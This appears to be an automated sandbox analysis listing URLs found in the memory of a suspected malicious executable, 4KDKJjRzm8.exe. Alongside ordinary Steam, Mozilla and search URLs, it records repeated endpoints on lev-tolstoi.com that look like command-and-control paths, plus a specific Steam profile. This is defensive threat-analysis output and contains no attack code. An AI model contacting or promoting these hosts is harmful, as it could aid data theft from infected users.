                Source: 4KDKJjRzm8.exe, 00000000.00000003.1466309055.000000000135D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1466220436.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shar
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1466309055.000000000135D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1466220436.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1516348850.0000000005CB8000.00000004.00000800.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1516290444.0000000005CB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1541193562.0000000005CB6000.00000004.00000800.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1565070208.0000000005CB6000.00000004.00000800.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1540810685.0000000005CB6000.00000004.00000800.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1542630820.0000000005CB6000.00000004.00000800.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1516290444.0000000005CB6000.00000004.00000800.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1539246157.0000000005CB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1465201943.0000000005C5C000.00000004.00000800.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1465087302.0000000005C5C000.00000004.00000800.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1465001687.0000000005C5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1465201943.0000000005C5C000.00000004.00000800.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1465087302.0000000005C5C000.00000004.00000800.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1465001687.0000000005C5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1465201943.0000000005C5C000.00000004.00000800.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1465087302.0000000005C5C000.00000004.00000800.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1465001687.0000000005C5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1516290444.0000000005CB6000.00000004.00000800.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1539246157.0000000005CB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqd4plX4pbW1CbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1539369110.0000000005CB9000.00000004.00000800.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1516348850.0000000005CB8000.00000004.00000800.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1610249625.0000000001370000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000002.1614778336.0000000001370000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1513284186.000000000135D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1516290444.0000000005CB6000.00000004.00000800.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1582545384.0000000001370000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1539309056.0000000001360000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1539309056.0000000001360000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com//Passw
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1438106482.00000000012F9000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.00000000012F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/3
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1488959320.0000000001360000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1515928263.000000000135D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1488193272.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1513284186.000000000135D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1539309056.0000000001360000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/ARE
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1513399465.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1539387547.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1543528478.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1488231577.000000000131E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/J
                Source: 4KDKJjRzm8.exe, 4KDKJjRzm8.exe, 00000000.00000003.1610641364.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1613444081.00000000012D8000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1613613036.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1565125707.000000000136D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000002.1614536555.00000000012D8000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000002.1614720928.000000000131E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/api
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1539387547.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1543528478.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1488231577.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1513371568.000000000132D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/api)
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apih
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1613301096.0000000001370000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1610249625.0000000001370000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000002.1614778336.0000000001370000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1582545384.0000000001370000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apilT
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1539309056.0000000001360000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apin
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1515928263.000000000135D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1513284186.000000000135D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apitly
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1610249625.0000000001361000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1613301096.0000000001366000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000002.1614778336.0000000001366000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/iaj
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1515928263.000000000135D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1513284186.000000000135D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1539309056.0000000001360000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/ients/
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1613301096.0000000001370000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000002.1614778336.0000000001370000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1513284186.000000000135D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/pi
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/pi0
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1543231877.000000000136F000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1542773608.000000000136D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1565125707.000000000136D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1610249625.0000000001370000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1582545384.0000000001370000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1539309056.0000000001360000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/pi4
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1488959320.0000000001360000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1488193272.000000000135F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/piD
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1613301096.0000000001370000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1610249625.0000000001370000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000002.1614778336.0000000001370000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1582545384.0000000001370000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/pitT
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1613301096.0000000001370000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1610249625.0000000001370000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000002.1614778336.0000000001370000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1582545384.0000000001370000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/qo
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1565125707.000000000136D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1610249625.0000000001370000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000002.1614778336.0000000001370000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1582545384.0000000001370000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/s
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1613301096.0000000001370000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1565125707.000000000136D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1610249625.0000000001370000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000002.1614778336.0000000001370000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1582545384.0000000001370000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/srd
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1565125707.000000000136D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/stT
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1565125707.000000000136D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/te
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1466220436.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1466220436.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1466309055.000000000135D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1466220436.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1466220436.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1466309055.000000000135D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1466220436.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1466220436.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1466309055.000000000135D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1466220436.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1466309055.000000000135D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1466220436.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1466220436.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1466309055.000000000135D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.00000000012DC000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1466220436.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1466309055.000000000135D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1466220436.000000000131E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1437953868.00000000012DC000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1466309055.000000000135D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1466220436.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/i
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1466220436.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowe
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1466309055.000000000135D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.00000000012DC000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1466220436.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1515973644.0000000005D46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1515973644.0000000005D46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1541193562.0000000005CB6000.00000004.00000800.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1565070208.0000000005CB6000.00000004.00000800.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1540810685.0000000005CB6000.00000004.00000800.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1542630820.0000000005CB6000.00000004.00000800.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1516290444.0000000005CB6000.00000004.00000800.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1539246157.0000000005CB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_e149f5d53c9263616797a13067f7a114fa287709b159d0a5
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1465201943.0000000005C5C000.00000004.00000800.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1465087302.0000000005C5C000.00000004.00000800.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1465001687.0000000005C5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1466220436.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1465201943.0000000005C5C000.00000004.00000800.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1465087302.0000000005C5C000.00000004.00000800.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1465001687.0000000005C5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1466309055.000000000135D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1466220436.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
